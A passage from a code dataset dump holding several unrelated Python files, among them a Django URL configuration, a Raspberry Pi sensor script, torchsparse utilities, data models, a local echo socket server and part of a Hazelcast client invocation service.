path\nfrom django.contrib import admin\nfrom django.views.generic.base import TemplateView\nfrom djoser.views import UserViewSet, TokenCreateView\nfrom rest_framework import routers\n\nimport manabi.views\nfrom manabi.apps.flashcards.api_views import (\n DeckViewSet,\n SynchronizedDeckViewSet,\n SharedDeckViewSet,\n 
SuggestedSharedDecksViewSet,\n ManabiReaderFactViewSet,\n FactViewSet,\n CardViewSet,\n)\nfrom manabi.apps.manabi_auth.api_views import (\n AppleLoginView,\n exchange_token,\n)\nfrom manabi.apps.review_results.api_views import ReviewResultsView\n\n\napi_router = routers.DefaultRouter()\napi_router.register(r'flashcards/decks',\n DeckViewSet,\n basename='deck')\napi_router.register(r'flashcards/synchronized_decks',\n SynchronizedDeckViewSet,\n basename='synchronized-deck')\napi_router.register(r'flashcards/suggested_shared_decks',\n SuggestedSharedDecksViewSet,\n basename='suggested-shared-deck')\napi_router.register(r'flashcards/shared_decks',\n SharedDeckViewSet,\n basename='shared-deck')\napi_router.register(r'flashcards/facts',\n FactViewSet,\n basename='fact')\napi_router.register(r'flashcards/manabi_reader_facts',\n ManabiReaderFactViewSet,\n basename='fact')\napi_router.register(r'flashcards/cards',\n CardViewSet,\n basename='card')\n\nurlpatterns = [\n url(r'^apple-app-site-association$', TemplateView.as_view(\n template_name='apple_app_site_association.json',\n content_type='application/json',\n )),\n\n url(r'^ios-required/', TemplateView.as_view(\n template_name='ios_required.html'), name='ios-required'),\n\n url(r'^accounts/', include('allauth.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'impersonate/', include('impersonate.urls')),\n url(r'^rq/', include('django_rq.urls')),\n\n url(r'^$', manabi.views.homepage, name='homepage'),\n url(r'^flashcards/', include('manabi.apps.flashcards.urls')),\n url(r'^reader_feeds/', include('manabi.apps.reader_feeds.urls')),\n url(r'^users/', include('manabi.apps.profiles.urls')),\n\n url(r'^terms-of-service/$', TemplateView.as_view(\n template_name='tos.html'), name='terms_of_service'),\n url(r'^privacy-policy/$', TemplateView.as_view(\n template_name='privacy.html'), name='privacy_policy'),\n url(r'^credits/$', TemplateView.as_view(\n template_name='credits.html'), name='credits'),\n\n # API URLs.\n url(r'^api/', include((api_router.urls, 'api'))),\n\n path('api/dj-rest-auth/', include('dj_rest_auth.urls')),\n # path('api/dj-rest-auth/registration/', include('dj_rest_auth.registration.urls'))\n path('api/dj-rest-auth/apple/', AppleLoginView.as_view()),\n\n url(r'^api/auth/social_login/(?P\\S+)/$', exchange_token),\n url(r'^api/auth/users/create/', UserViewSet.as_view({'post': 'create'})),\n url(r'^api/auth/token/create/', TokenCreateView.as_view()),\n url(r'^api/auth/', include('djoser.urls')),\n url(r'^api/auth/', include('djoser.urls.authtoken')),\n\n url(r'^api/flashcards/', include('manabi.apps.flashcards.api_urls')),\n url(r'^api/flashcards/review_results/',\n include('manabi.apps.review_results.api_urls')),\n url(r'^api/subscriptions/', include('manabi.apps.subscriptions.api_urls')),\n url(r'^api/furigana/', include('manabi.apps.furigana.urls')),\n url(r'^api/twitter_usages/', include('manabi.apps.twitter_usages.urls')),\n url(r'^api/word_tracking/', include('manabi.apps.word_tracking.api_urls')),\n]\n\n# if not settings.LIVE_HOST:\n# urlpatterns += [url(r'^silk/', include('silk.urls', namespace='silk'))]\nif 'silk' in settings.INSTALLED_APPS:\n urlpatterns += [url(r'^silk/', include('silk.urls', namespace='silk'))]\n","sub_path":"manabi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"579346961","text":"from signal import *\nimport atexit\nimport helpers\nimport resources\nimport sys\nimport 
temperature_sensor\nimport time\n\nimport part1\nimport part2\nimport part3\nimport part4\n\n# Type in your Raspberry Pi's name, description, and location here\nname = \"Example Raspberry Pi Name (dont use me!)\"\ndescription = \"This is my raspberry pi!\"\nposition_x = -1\nposition_y = -1\n\n# (Set up some helpers to clean up when we finish running):\npermit_cleanup = True\natexit.register(lambda: helpers.perform_part5_cleanup(name, permit_cleanup))\nfor sig in (SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, SIGHUP):\n signal(sig, lambda x, y: helpers.perform_part5_cleanup(name, permit_cleanup))\n\nif __name__ == \"__main__\":\n # First, we need to create a PI Point:\n pipoint_response = part1.create_pipoint(\n name,\n resources.base_url,\n resources.dataserver_web_id)\n\n # (We check that the PI Point was successfully created before continuing):\n if pipoint_response.text != \"\":\n permit_cleanup = False\n print(pipoint_response.text)\n\n # (We need the PI Point WebId later, so we get it now):\n pipoint_web_id = helpers.get_web_id(pipoint_response)\n\n # Second, we need to create an AF Element:\n element_response = part2.create_af_element(\n name,\n description,\n resources.base_url,\n resources.parent_af_element_web_id)\n \n # (Here, we retrieve the WebIds for the X and Y coordinate attributes):\n coordinate_web_ids = helpers.get_coordinate_locations(element_response)\n\n # Third, we update the X and Y coordinates to match our location:\n part3.update_af_attribute(\n position_x,\n resources.base_url,\n coordinate_web_ids.x_web_id)\n part3.update_af_attribute(\n position_y,\n resources.base_url,\n coordinate_web_ids.y_web_id)\n\n # (Here, we retrieve the WebId for the Temperature attribute):\n value_web_id = helpers.get_attribute_web_id_by_name(\n \"Temperature\",\n resources.base_url,\n helpers.get_web_id(element_response))\n\n # Finally, we read the temperature from the temperature sensor, and POST\n # the value to the PI Point:\n sensor = temperature_sensor.TemperatureSensor()\n while True:\n current_temperature = sensor.read_temp()\n print(\"Sending: \" + str(current_temperature))\n part4.post_pi_value(\n current_temperature,\n pipoint_web_id,\n resources.base_url)\n print(\"Received: \" + str(helpers.get_attribute_field(\n value_web_id,\n lambda x: x[\"Value\"])))\n time.sleep(5)\n\n \n \n","sub_path":"Instructor Copies/Exercise1/part5.py","file_name":"part5.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"416449580","text":"import pandas as pd\nimport scipy.stats as st\nimport numpy as np\n\ndef ta_chip(high, low, close, volume, window):\n price_dist = (close-(high+low)/2)**2\n new_vol = price_dist * volume\n chip_avg = pd.Series(np.nan, index=close.index)\n chip_score = pd.Series(np.nan, index=close.index)\n #\n for i in range(window-1, close.shape[0]):\n newvol_col = new_vol.iloc[i-window+1:i+1]\n weight = newvol_col / newvol_col.sum()\n price_weight = close.iloc[i-window+1:i+1] * weight\n chip_avg.iloc[i] = price_weight.sum()\n z_score = (close.iloc[i] - chip_avg.iloc[i]) / close.iloc[i-window+1:i+1].std()\n p_values = st.norm.cdf(z_score)\n chip_score.iloc[i] = p_values\n #\n return chip_avg, chip_score","sub_path":"dev/yfissue_1/lambda_new_talib.py","file_name":"lambda_new_talib.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"405427457","text":"import marshmallow\nfrom marshmallow 
import INCLUDE, fields\nfrom marshmallow_enum import EnumField\nfrom sqlalchemy import func\n\nfrom crc import db, ma\nfrom crc.api.common import ApiErrorSchema\nfrom crc.models.file import FileModel, SimpleFileSchema, FileSchema\nfrom crc.models.protocol_builder import ProtocolBuilderStatus, ProtocolBuilderStudy\nfrom crc.models.workflow import WorkflowSpecCategoryModel, WorkflowState, WorkflowStatus, WorkflowSpecModel, \\\n WorkflowModel\n\n\nclass StudyModel(db.Model):\n __tablename__ = 'study'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String)\n last_updated = db.Column(db.DateTime(timezone=True), default=func.now())\n protocol_builder_status = db.Column(db.Enum(ProtocolBuilderStatus))\n primary_investigator_id = db.Column(db.String, nullable=True)\n sponsor = db.Column(db.String, nullable=True)\n hsr_number = db.Column(db.String, nullable=True)\n ind_number = db.Column(db.String, nullable=True)\n user_uid = db.Column(db.String, db.ForeignKey('user.uid'), nullable=False)\n investigator_uids = db.Column(db.ARRAY(db.String), nullable=True)\n requirements = db.Column(db.ARRAY(db.Integer), nullable=True)\n on_hold = db.Column(db.Boolean, default=False)\n\n def update_from_protocol_builder(self, pbs: ProtocolBuilderStudy):\n self.hsr_number = pbs.HSRNUMBER\n self.title = pbs.TITLE\n self.user_uid = pbs.NETBADGEID\n self.last_updated = pbs.DATE_MODIFIED\n\n self.protocol_builder_status = ProtocolBuilderStatus.ACTIVE\n if pbs.HSRNUMBER:\n self.protocol_builder_status = ProtocolBuilderStatus.OPEN\n if self.on_hold:\n self.protocol_builder_status = ProtocolBuilderStatus.HOLD\n\n\nclass WorkflowMetadata(object):\n def __init__(self, id, name, display_name, description, spec_version, category_id, state: WorkflowState, status: WorkflowStatus,\n total_tasks, completed_tasks, display_order):\n self.id = id\n self.name = name\n self.display_name = display_name\n self.description = description\n self.spec_version = spec_version\n self.category_id = category_id\n self.state = state\n self.status = status\n self.total_tasks = total_tasks\n self.completed_tasks = completed_tasks\n self.display_order = display_order\n\n\n @classmethod\n def from_workflow(cls, workflow: WorkflowModel):\n instance = cls(\n id=workflow.id,\n name=workflow.workflow_spec.name,\n display_name=workflow.workflow_spec.display_name,\n description=workflow.workflow_spec.description,\n spec_version=workflow.spec_version(),\n category_id=workflow.workflow_spec.category_id,\n state=WorkflowState.optional,\n status=workflow.status,\n total_tasks=workflow.total_tasks,\n completed_tasks=workflow.completed_tasks,\n display_order=workflow.workflow_spec.display_order\n )\n return instance\n\n\nclass WorkflowMetadataSchema(ma.Schema):\n state = EnumField(WorkflowState)\n status = EnumField(WorkflowStatus)\n class Meta:\n model = WorkflowMetadata\n additional = [\"id\", \"name\", \"display_name\", \"description\",\n \"total_tasks\", \"completed_tasks\", \"display_order\"]\n unknown = INCLUDE\n\n\nclass Category(object):\n def __init__(self, model: WorkflowSpecCategoryModel):\n self.id = model.id\n self.name = model.name\n self.display_name = model.display_name\n self.display_order = model.display_order\n\n\nclass CategorySchema(ma.Schema):\n workflows = fields.List(fields.Nested(WorkflowMetadataSchema), dump_only=True)\n class Meta:\n model = Category\n additional = [\"id\", \"name\", \"display_name\", \"display_order\"]\n unknown = INCLUDE\n\n\nclass Study(object):\n\n def __init__(self, title, last_updated, 
primary_investigator_id, user_uid,\n id=None,\n protocol_builder_status=None,\n sponsor=\"\", hsr_number=\"\", ind_number=\"\", categories=None,\n files=None, approvals=None, **argsv):\n self.id = id\n self.user_uid = user_uid\n self.title = title\n self.last_updated = last_updated\n self.protocol_builder_status = protocol_builder_status\n self.primary_investigator_id = primary_investigator_id\n self.sponsor = sponsor\n self.hsr_number = hsr_number\n self.ind_number = ind_number\n # default to fresh lists so instances never share a mutable default argument\n self.categories = categories if categories is not None else []\n self.approvals = approvals if approvals is not None else []\n self.warnings = []\n self.files = files if files is not None else []\n\n @classmethod\n def from_model(cls, study_model: StudyModel):\n id = study_model.id # Just read some value, in case the dict expired, otherwise dict may be empty.\n args = dict((k, v) for k, v in study_model.__dict__.items() if not k.startswith('_'))\n instance = cls(**args)\n return instance\n\n def update_model(self, study_model: StudyModel):\n for k,v in self.__dict__.items():\n if not k.startswith('_'):\n study_model.__dict__[k] = v\n\n def model_args(self):\n \"\"\"Arguments that can be passed into the Study Model to update it.\"\"\"\n self_dict = self.__dict__.copy()\n del self_dict[\"categories\"]\n del self_dict[\"warnings\"]\n return self_dict\n\n\nclass StudySchema(ma.Schema):\n\n id = fields.Integer(required=False, allow_none=True)\n categories = fields.List(fields.Nested(CategorySchema), dump_only=True)\n warnings = fields.List(fields.Nested(ApiErrorSchema), dump_only=True)\n protocol_builder_status = EnumField(ProtocolBuilderStatus)\n hsr_number = fields.String(allow_none=True)\n sponsor = fields.String(allow_none=True)\n ind_number = fields.String(allow_none=True)\n files = fields.List(fields.Nested(FileSchema), dump_only=True)\n approvals = fields.List(fields.Nested('ApprovalSchema'), dump_only=True)\n\n class Meta:\n model = Study\n additional = [\"id\", \"title\", \"last_updated\", \"primary_investigator_id\", \"user_uid\",\n \"sponsor\", \"ind_number\", \"approvals\", \"files\"]\n unknown = INCLUDE\n\n @marshmallow.post_load\n def make_study(self, data, **kwargs):\n \"\"\"Can load the basic study data for updates to the database, but categories are write only\"\"\"\n return Study(**data)\n\n","sub_path":"crc/models/study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"492111725","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = '04 多进程并发_服务端_scoket.py'\n__author__ = 'yangyang'\n__mtime__ = '2018.03.08'\n\"\"\"\n\nimport socket\nfrom multiprocessing import Process\n\ndef talk(conn):\n\twhile True:\n\t\ttry:\n\t\t\tres = conn.recv(1024)\n\t\t\tif not res: break # an empty read means the client closed the connection\n\t\t\tprint(\"recv:\",res)\n\t\t\tconn.send(res)\n\t\texcept ConnectionResetError:\n\t\t\tbreak\n\tconn.close()\n\ndef server(ip_port):\n\tserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\tserver.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)\n\tserver.bind(ip_port)\n\tserver.listen(5)\n\n\twhile True:\n\t\tconn,client_addr = server.accept()\n\t\tp = Process(target=talk,args=(conn,))\n\t\tp.start()\n\tserver.close()\n\n\nif __name__ == '__main__':\n\tip_port = ('127.0.0.1',8090)\n\tserver(ip_port)\n\n\n","sub_path":"fourth_module/复习/04 多进程并发_服务端_scoket.py","file_name":"04 多进程并发_服务端_scoket.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"186306603","text":"import torchsparse\nimport torchsparse.nn as 
spnn\nimport torchsparse.nn.functional as spf\nfrom torchsparse.sparse_tensor import SparseTensor\nfrom torchsparse.point_tensor import PointTensor\nfrom torchsparse.utils.kernel_region import *\nfrom torchsparse.utils.helpers import *\n\n\n__all__ = ['initial_voxelize', 'point_to_voxel', 'voxel_to_point']\n\n\n# z: PointTensor\n# return: SparseTensor\ndef initial_voxelize(z, init_res, after_res):\n new_float_coord = torch.cat(\n [(z.C[:, :3] * init_res) / after_res, z.C[:, -1].view(-1, 1)], 1)\n\n pc_hash = spf.sphash(torch.floor(new_float_coord).int())\n sparse_hash = torch.unique(pc_hash)\n idx_query = spf.sphashquery(pc_hash, sparse_hash)\n counts = spf.spcount(idx_query.int(), len(sparse_hash))\n\n inserted_coords = spf.spvoxelize(torch.floor(new_float_coord), idx_query,\n counts)\n inserted_coords = torch.round(inserted_coords).int()\n inserted_feat = spf.spvoxelize(z.F, idx_query, counts)\n\n new_tensor = SparseTensor(inserted_feat, inserted_coords, 1)\n new_tensor.check()\n z.additional_features['idx_query'][1] = idx_query\n z.additional_features['counts'][1] = counts\n z.C = new_float_coord\n\n return new_tensor\n\n\n# x: SparseTensor, z: PointTensor\n# return: SparseTensor\ndef point_to_voxel(x, z):\n if z.additional_features is None or z.additional_features.get('idx_query') is None\\\n or z.additional_features['idx_query'].get(x.s) is None:\n #pc_hash = hash_gpu(torch.floor(z.C).int())\n pc_hash = spf.sphash(\n torch.cat([\n torch.floor(z.C[:, :3] / x.s).int() * x.s,\n z.C[:, -1].int().view(-1, 1)\n ], 1))\n sparse_hash = spf.sphash(x.C)\n idx_query = spf.sphashquery(pc_hash, sparse_hash)\n counts = spf.spcount(idx_query.int(), x.C.shape[0])\n z.additional_features['idx_query'][x.s] = idx_query\n z.additional_features['counts'][x.s] = counts\n else:\n idx_query = z.additional_features['idx_query'][x.s]\n counts = z.additional_features['counts'][x.s]\n\n inserted_feat = spf.spvoxelize(z.F, idx_query, counts)\n new_tensor = SparseTensor(inserted_feat, x.C, x.s)\n new_tensor.coord_maps = x.coord_maps\n new_tensor.kernel_maps = x.kernel_maps\n\n return new_tensor\n\n\n# # x: SparseTensor, z: PointTensor\n# # return: PointTensor\n# def voxel_to_point(x, z, nearest=False):\n# if z.idx_query is None or z.weights is None or z.idx_query.get(\n# x.s) is None or z.weights.get(x.s) is None:\n# kr = KernelRegion(2, x.s, 1)\n# off = kr.get_kernel_offset().to(z.F.device)\n# #old_hash = kernel_hash_gpu(torch.floor(z.C).int(), off)\n# old_hash = spf.sphash(\n# torch.cat([\n# torch.floor(z.C[:, :3] / x.s).int() * x.s,\n# z.C[:, -1].int().view(-1, 1)\n# ], 1), off)\n# pc_hash = spf.sphash(x.C.to(z.F.device))\n# idx_query = spf.sphashquery(old_hash, pc_hash)\n# weights = spf.calc_ti_weights(z.C, idx_query,\n# scale=x.s).transpose(0, 1).contiguous().float()\n# idx_query = idx_query.transpose(0, 1).contiguous()\n# if nearest:\n# weights[:, 1:] = 0.\n# idx_query[:, 1:] = -1\n# new_feat = spf.spdevoxelize(x.F, idx_query, weights)\n# new_tensor = PointTensor(new_feat,\n# z.C,\n# idx_query=z.idx_query,\n# weights=z.weights)\n# new_tensor.additional_features = z.additional_features\n# new_tensor.idx_query[x.s] = idx_query\n# new_tensor.weights[x.s] = weights\n# z.idx_query[x.s] = idx_query\n# z.weights[x.s] = weights\n\n# else:\n# new_feat = spf.spdevoxelize(x.F, z.idx_query.get(x.s), z.weights.get(x.s))\n# new_tensor = PointTensor(new_feat,\n# z.C,\n# idx_query=z.idx_query,\n# weights=z.weights)\n# new_tensor.additional_features = z.additional_features\n\n# return new_tensor\n\n\ndef 
calc_ti_weights(coords, idx_query):\n mask = torch.cuda.FloatTensor(\n [[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1],\n [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]])\n frac = coords - torch.floor(coords)\n frac = frac[:, 0:3]\n frac = torch.cuda.FloatTensor([1, 1, 1]) - mask - torch.unsqueeze(frac, dim=1)\n weights = torch.abs(torch.prod(frac, dim=2)).t()\n weights[idx_query == -1] = 0\n weights /= weights.sum(0) + 1e-8\n return weights\n\n# x: SparseTensor, z: PointTensor\n# return: PointTensor\ndef voxel_to_point(x, z, nearest=False):\n #print(x.s)\n #print(z.C.shape)\n h = x.C.shape[0]\n npt = z.C.shape[0] \n if z.idx_query is None or z.weights is None or z.idx_query.get(\n x.s) is None or z.weights.get(x.s) is None:\n kr = KernelRegion(2, x.s, 1)\n off = kr.get_kernel_offset().to(z.F.device)\n #old_hash = kernel_hash_gpu(torch.floor(z.C).int(), off)\n old_hash = spf.sphash(\n torch.cat([\n torch.floor(z.C[:, :3] / x.s).int() * x.s,\n z.C[:, -1].int().view(-1, 1)\n ], 1), off)\n pc_hash = spf.sphash(x.C.to(z.F.device))\n idx_query = spf.sphashquery(old_hash, pc_hash)\n weights = calc_ti_weights(z.C, idx_query).transpose(0, 1).contiguous()\n\n idx_query = idx_query.transpose(0, 1).contiguous()\n #print(idx_query[idx_query==-1])\n\n ids = torch.arange(npt).view(npt, 1).cuda()\n ids = ids.repeat(1, 8).view(-1)\n idx = idx_query.view(-1)\n flgs = idx > -1\n ids = ids[flgs]\n idx = idx[flgs]\n weights = weights.view(-1)[flgs].float()\n \n indices = torch.cat([torch.unsqueeze(ids, dim=1), torch.unsqueeze(idx, dim=1)], dim=1).long()\n\n mat = torch.sparse.FloatTensor(indices.t(), weights, torch.Size([npt, h])).cuda()\n\n new_feat = torch.sparse.mm(mat, x.F)\n\n new_tensor = PointTensor(new_feat,\n z.C,\n idx_query=z.idx_query,\n weights=z.weights)\n new_tensor.additional_features = z.additional_features\n new_tensor.idx_query[x.s] = idx_query\n new_tensor.weights[x.s] = weights\n z.idx_query[x.s] = idx_query\n z.weights[x.s] = weights\n\n else:\n weights = z.weights.get(x.s)\n idx_query = z.idx_query.get(x.s)\n \n ids = torch.arange(npt).view(npt, 1).cuda()\n ids = ids.repeat(1, 8).view(-1)\n idx = idx_query.view(-1)\n flgs = idx > -1\n ids = ids[flgs]\n idx = idx[flgs]\n weights = weights.view(-1)[flgs]\n indices = torch.cat([torch.unsqueeze(ids, dim=1), torch.unsqueeze(idx, dim=1)], dim=1).long()\n\n mat = torch.sparse.FloatTensor(indices.t(), weights, torch.Size([npt, h])).cuda()\n new_feat = torch.sparse.mm(mat, x.F)\n \n new_tensor = PointTensor(new_feat,\n z.C,\n idx_query=z.idx_query,\n weights=z.weights)\n new_tensor.additional_features = z.additional_features\n\n return new_tensor\n\n\ndef nearest_voxel(x, z):\n #print(x.s)\n #print(z.C.shape)\n #old_hash = kernel_hash_gpu(torch.floor(z.C).int(), off)\n old_hash = spf.sphash(\n torch.cat([\n torch.floor(torch.round(z.C[:, :3]) / x.s).int() * x.s,\n z.C[:, -1].int().view(-1, 1)\n ], 1))\n pc_hash = spf.sphash(x.C.to(z.F.device))\n idx_query = spf.sphashquery(old_hash, pc_hash)\n assert((idx_query!=-1).all())\n new_feat = x.F[idx_query, :]\n new_tensor = PointTensor(new_feat,\n z.C)\n\n return new_tensor","sub_path":"spvnas_patch/spvnas/core/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"34207991","text":"##################################################\n## {Description}: Rename and resize the dataset by \n## numbering format e.g.: 000001.png\n##################################################\n## 
Author: Khairul Izwan Bin Kamsani\n## Version: {1}.{0}.{0}\n## Email: {wansnap@gmail.com}\n##################################################\n\n# import the necessary packages\nfrom imutils import paths\nimport argparse\nimport imutils\nimport cv2\nimport os\n\nfrom pyimagesearch.preprocessing.aspectawarepreprocessor import AspectAwarePreprocessor\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True, \n\thelp=\"path to input directory of images\")\nap.add_argument(\"-a\", \"--annot\", required=True, \n\thelp=\"path to output directory of annotations\")\nap.add_argument(\"-f\", \"--folder\", required=True, help=\"folder name\")\nap.add_argument(\"-ws\", \"--width\", required=False, default=200, \n\thelp=\"width size\")\nap.add_argument(\"-hs\", \"--height\", required=False, default=200, \n\thelp=\"height size\")\nargs = vars(ap.parse_args())\n\n# grab the image paths then initialize the dictionary of character\n# counts\nimagePaths = list(paths.list_images(args[\"input\"]))\ncount = 0\n\n# initiate aspectawarepreprocessor\naap = AspectAwarePreprocessor(args[\"width\"], args[\"height\"])\n\n# loop over the image paths\nfor (i, imagePath) in enumerate(imagePaths):\n\t# display an update to the user\n\tprint(\"[INFO] processing image {}/{}\".format(i + 1, len(imagePaths)))\n\n\ttry:\n\t\t# load the image\n\t\timage = cv2.imread(imagePath)\n\n\t\t# resize the image\n\t\timage = aap.preprocess(image)\n\n\t\t# construct the path the output directory\n\t\tdirPath = os.path.join(args[\"annot\"], args[\"folder\"])\n\n\t\t# if the output directory does not exist, create it\n\t\tif not os.path.exists(dirPath):\n\t\t\tos.makedirs(dirPath)\n\n\t\t# write the labeled character to file\n\t\tp = os.path.sep.join([dirPath, \"{}_W{}H{}.png\".format(\n\t\t\tstr(count).zfill(6), args[\"width\"], args[\"height\"])])\n\t\tcv2.imwrite(p, image)\n\t\n\t\t# increment the count for the current key\n\t\tcount = count + 1\n\n\t# we are trying to control-c out of the script, so break from the\n\t# loop (you still need to press a key for the active window to\n\t# trigger this)\n\texcept KeyboardInterrupt:\n\t\tprint(\"[INFO] manually leaving script\")\n\t\tbreak\n\n\t# an unknown error has occurred for this particular image\n\texcept:\n\t\tprint(\"[INFO] skipping image...\")\n","sub_path":"intelligent_robot_vision/vision_oil_palm_fruit_detection/scripts/resize_aspect_ratio_dataset.py","file_name":"resize_aspect_ratio_dataset.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"309868527","text":"import os\nimport sys\nimport lib_common\nfrom lib_properties import pc\n\nimport win32con\nimport win32api\n\nTypeLibRegistryKey = win32api.RegOpenKey(win32con.HKEY_CLASSES_ROOT, \"TypeLib\")\n\ndef ComKeyAllNameVersion(key, keyName):\n\tresult = {}\n\tsys.stderr.write(\"ComKeyAllNameVersion key=%s keyName=%s\\n\" % (key,keyName) )\n\n\ttry:\n\t\tsubKey = win32api.RegOpenKey(key, keyName)\n\texcept:\n\t\texc = sys.exc_info()\n\t\tlib_common.ErrorMessageHtml(\"ComKeyAllNameVersion key=%s keyName=%s. 
Error:%s\"%(key,keyName,str(exc)))\n\n\ttry:\n\t\t\tsubNum = 0\n\t\t\tbestVersion = 0.0\n\t\t\twhile 1:\n\t\t\t\t\ttry:\n\t\t\t\t\t\t\tversionStr = win32api.RegEnumKey(subKey, subNum)\n\t\t\t\t\texcept win32api.error:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tname = win32api.RegQueryValue(subKey, versionStr)\n\t\t\t\t\t# sys.stderr.write(\"name=%s\\n\" % name)\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\t\tversionFlt = float(versionStr)\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tversionFlt = 0 # ????\n\n\t\t\t\t\tresult[ versionFlt ] = name\n\t\t\t\t\tsubNum = subNum + 1\n\tfinally:\n\t\t\twin32api.RegCloseKey(subKey)\n\n\treturn result\n\ndef ComKeyLastName(result):\n\tbestVrs = -999.0\n\tbestNam = \"\"\n\n\tfor vers, name in list( result.items() ):\n\t\tif vers > bestVrs:\n\t\t\tbestVrs = vers\n\t\t\tbestNam = name\n\t\t\t\n\treturn ( bestNam, bestVrs )\n\ndef CreateComRegisteredTypeLibNode( grph, key, name, version ):\n\ttypelibNode = lib_common.gUriGen.ComRegisteredTypeLibUri( key )\n\tstrTypLibName = \"%s / %.1f\" % ( name , version )\n\tgrph.add( (typelibNode, pc.property_information, lib_common.NodeLiteral(strTypLibName) ) )\n\n\treturn typelibNode\n","sub_path":"survol/lib_com_type_lib.py","file_name":"lib_com_type_lib.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"131750603","text":"import logging\nimport time\nimport functools\n\nfrom hazelcast.errors import create_error_from_message, HazelcastInstanceNotActiveError, is_retryable_error, \\\n HazelcastTimeoutError, TargetDisconnectedError, HazelcastClientNotActiveError, TargetNotMemberError, \\\n EXCEPTION_MESSAGE_TYPE\nfrom hazelcast.future import Future\nfrom hazelcast.util import AtomicInteger\nfrom hazelcast import six\n\n\ndef _no_op_response_handler(_):\n pass\n\n\nclass Invocation(object):\n __slots__ = (\"request\", \"timeout\", \"partition_id\", \"uuid\", \"connection\", \"event_handler\",\n \"future\", \"sent_connection\", \"urgent\", \"response_handler\")\n\n def __init__(self, request, partition_id=-1, uuid=None, connection=None,\n event_handler=None, urgent=False, timeout=None, response_handler=_no_op_response_handler):\n self.request = request\n self.partition_id = partition_id\n self.uuid = uuid\n self.connection = connection\n self.event_handler = event_handler\n self.urgent = urgent\n self.timeout = timeout\n self.future = Future()\n self.timeout = None\n self.sent_connection = None\n self.response_handler = response_handler\n\n def set_response(self, response):\n try:\n result = self.response_handler(response)\n self.future.set_result(result)\n except Exception as e:\n self.future.set_exception(e)\n\n def set_exception(self, exception, traceback=None):\n self.future.set_exception(exception, traceback)\n\n\nclass InvocationService(object):\n logger = logging.getLogger(\"HazelcastClient.InvocationService\")\n\n def __init__(self, client, reactor, logger_extras):\n config = client.config\n if config.network.smart_routing:\n self.invoke = self._invoke_smart\n else:\n self.invoke = self._invoke_non_smart\n\n self._client = client\n self._reactor = reactor\n self._logger_extras = logger_extras\n self._partition_service = None\n self._connection_manager = None\n self._listener_service = None\n self._check_invocation_allowed_fn = None\n self._pending = {}\n self._next_correlation_id = AtomicInteger(1)\n self._is_redo_operation = config.network.redo_operation\n self._invocation_timeout = self._init_invocation_timeout()\n 
self._invocation_retry_pause = self._init_invocation_retry_pause()\n self._shutdown = False\n\n def start(self, partition_service, connection_manager, listener_service):\n self._partition_service = partition_service\n self._connection_manager = connection_manager\n self._listener_service = listener_service\n self._check_invocation_allowed_fn = connection_manager.check_invocation_allowed\n\n def handle_client_message(self, message):\n correlation_id = message.get_correlation_id()\n\n if message.start_frame.has_event_flag():\n self._listener_service.handle_client_message(message, correlation_id)\n return\n\n invocation = self._pending.pop(correlation_id, None)\n if not invocation:\n self.logger.warning(\"Got message with unknown correlation id: %s\", message, extra=self._logger_extras)\n return\n\n if message.get_message_type() == EXCEPTION_MESSAGE_TYPE:\n error = create_error_from_message(message)\n return self._handle_exception(invocation, error)\n\n invocation.set_response(message)\n\n def shutdown(self):\n self._shutdown = True\n for invocation in list(six.itervalues(self._pending)):\n self._handle_exception(invocation, HazelcastClientNotActiveError())\n\n def _invoke_on_partition_owner(self, invocation, partition_id):\n owner_uuid = self._partition_service.get_partition_owner(partition_id)\n if not owner_uuid:\n self.logger.debug(\"Partition owner is not assigned yet\", extra=self._logger_extras)\n return False\n return self._invoke_on_target(invocation, owner_uuid)\n\n def _invoke_on_target(self, invocation, owner_uuid):\n connection = self._connection_manager.get_connection(owner_uuid)\n if not connection:\n self.logger.debug(\"Client is not connected to target: %s\" % owner_uuid, extra=self._logger_extras)\n return False\n return self._send(invocation, connection)\n\n def _invoke_on_random_connection(self, invocation):\n connection = self._connection_manager.get_random_connection()\n if not connection:\n self.logger.debug(\"No connection found to invoke\", extra=self._logger_extras)\n return False\n return self._send(invocation, connection)\n\n def _invoke_smart(self, invocation):\n if not invocation.timeout:\n invocation.timeout = self._invocation_timeout + time.time()\n\n try:\n if not invocation.urgent:\n self._check_invocation_allowed_fn()\n\n connection = invocation.connection\n if connection:\n invoked = self._send(invocation, connection)\n if not invoked:\n self._handle_exception(invocation, IOError(\"Could not invoke on connection %s\" % connection))\n return\n\n if invocation.partition_id != -1:\n invoked = self._invoke_on_partition_owner(invocation, invocation.partition_id)\n elif invocation.uuid:\n invoked = self._invoke_on_target(invocation, invocation.uuid)\n else:\n invoked = 